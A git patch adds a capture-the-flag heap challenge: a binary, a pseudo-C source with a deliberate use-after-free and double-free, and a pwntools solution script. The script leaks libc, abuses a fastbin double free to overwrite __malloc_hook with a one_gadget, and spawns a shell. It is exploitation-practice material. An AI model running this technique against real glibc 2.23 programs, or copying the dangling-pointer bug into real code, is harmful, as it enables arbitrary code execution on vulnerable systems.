From 9e612607656c2630aa03596d8f9ec7dd542de22d Mon Sep 17 00:00:00 2001
From: Jack Ren <bjrjk@qq.com>
Date: Thu, 24 Oct 2024 20:56:26 +0800
Subject: [PATCH] Finished FastBin/CaNaKMgF_remastered

---
 .../CaNaKMgF_remastered/CaNaKMgF_remastered   | Bin 0 -> 13456 bytes
 FastBin/CaNaKMgF_remastered/answer.py         |  68 ++++++++++++++++++
 FastBin/CaNaKMgF_remastered/pseudo.c          |  33 +++++++++
 3 files changed, 101 insertions(+)
 create mode 100755 FastBin/CaNaKMgF_remastered/CaNaKMgF_remastered
 create mode 100644 FastBin/CaNaKMgF_remastered/answer.py
 create mode 100644 FastBin/CaNaKMgF_remastered/pseudo.c

diff --git a/FastBin/CaNaKMgF_remastered/CaNaKMgF_remastered b/FastBin/CaNaKMgF_remastered/CaNaKMgF_remastered
new file mode 100755
index 0000000000000000000000000000000000000000..8cdc797c398be01d9416cd65537d1b739b8b738c
GIT binary patch
literal 13456
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
Pt@PzTcBrhpyX*fC0JIi5

literal 0
HcmV?d00001

diff --git a/FastBin/CaNaKMgF_remastered/answer.py b/FastBin/CaNaKMgF_remastered/answer.py
new file mode 100644
index 0000000..9b8d124
--- /dev/null
+++ b/FastBin/CaNaKMgF_remastered/answer.py
@@ -0,0 +1,68 @@
+#!/usr/bin/env python3
+# coding = utf-8
+
+# Env: Ubuntu 16.04.7 LTS, GLIBC 2.23-0ubuntu11.3
+
+from pwn import *
+context(arch = "amd64", os = "linux", log_level = "debug")
+context.terminal = ['/usr/bin/tmux', 'splitw', '-h']
+
+p = process('./CaNaKMgF_remastered')
+elf = ELF('./CaNaKMgF_remastered')
+libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
+# gdb.attach(p, "")
+# time.sleep(1)
+
+def menu(option):
+    p.recvuntil("5. Run away\n")
+    p.sendline(option)
+
+def allocate(size, data):
+    menu("1")
+    p.recvuntil("Length? ")
+    p.sendline(f"{size}")
+    p.send(data)
+
+def free(index):
+    menu("3")
+    p.recvuntil("Num? ")
+    p.sendline(f"{index}")
+
+def read(index):
+    menu("4")
+    p.recvuntil("Num? ")
+    p.sendline(f"{index}")
+    data = p.recvuntil("\n1. Allocate\n")
+    return data[:-13]
+
+# Leak libc base
+allocate(0x100, 'a') # 0
+allocate(0x100, 'a') # 1
+free(0)
+main_arena_p0x88 = u64(read(0).ljust(8, b'\x00'))
+print(f"main_arena + 0x88: {hex(main_arena_p0x88)}")
+libc_base = main_arena_p0x88 - 0x3c4b78
+print(f"libc_base: {hex(libc_base)}")
+free(1)
+
+# Double free
+allocate(0x60, 'a') # 2
+allocate(0x60, 'a') # 3
+allocate(0x60, 'a') # 4
+free(2)
+free(3)
+free(2)
+
+# Overwrite __malloc_hook by fake a chunk at (char *)__malloc_hook - 0x23
+__malloc_hook = libc_base + libc.symbols['__malloc_hook']
+
+allocate(0x60, p64(__malloc_hook - 0x23)) # 5
+allocate(0x60, 'a') # 6
+allocate(0x60, 'a') # 7
+
+one_gadget = libc_base + 0xf03a4 # constraints: [rsp+0x50] == NULL
+allocate(0x60, b'a' * 0x13 + p64(one_gadget)) # 8
+free(6)
+free(6)
+
+p.interactive()
\ No newline at end of file
diff --git a/FastBin/CaNaKMgF_remastered/pseudo.c b/FastBin/CaNaKMgF_remastered/pseudo.c
new file mode 100644
index 0000000..b93b8d6
--- /dev/null
+++ b/FastBin/CaNaKMgF_remastered/pseudo.c
@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+char* alloc_list[100];
+unsigned int alloc_idx = 0;
+int main() {
+  unsigned int option, size, index;
+  while (1) {
+    scanf("%u", &option);
+    switch (option) {
+      case 1: { // allocate(size, data)
+        scanf("%u", &size);
+        char *buf = malloc(size);
+        read(0, buf, size);
+        alloc_list[alloc_idx++] = buf;
+        break;
+      }
+      case 3: { // free(index)
+        scanf("%u", &index);
+        free(alloc_list[index]);
+        // alloc_list[index] is a 
+        // dangling pointer now
+        break;
+      }
+      case 4: { // read(index)
+        scanf("%u", &index);
+        puts(alloc_list[index]);
+        break;
+      }
+    }
+  }
+}
+